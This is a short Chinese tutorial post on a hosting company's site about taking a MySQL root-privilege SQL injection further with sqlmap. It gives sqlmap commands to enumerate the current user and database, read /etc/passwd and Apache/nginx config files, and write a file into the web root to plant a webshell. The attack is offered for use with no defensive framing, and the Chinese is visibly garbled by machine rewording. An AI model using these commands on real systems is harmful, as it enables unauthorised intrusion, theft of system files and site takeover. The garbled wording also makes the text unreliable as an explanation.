欢迎来到云服务器

网络技术

sqlmap注入mysql和到root权限后怎么样深入

 碰着一mysql root权限注入点,实验用sqlmap进一步渗透获取更高权限,东亚服务器 台湾服务器,详细如下:

判定注入点的当前用户和当前数据库

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

 

root权限注入点可以实验读取系统文件,好比/etc/passwd,以及apache,nginx的设置文件等,相关设置文件路径如下:

nginx: usr/local/nginx/conf/nginx.conf

 

常用的apache设置文件路径有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

 

sqlmap读取文件语法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以实验举办写入Webshell,sqlmap写入文件语法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

将当地的test.txt写入到站点处事器的html目次下。

腾讯云代理

Copyright © 2003-2021 MFISP.COM. 国外vps服务器租用 梦飞云服务器租用 版权所有 粤ICP备11019662号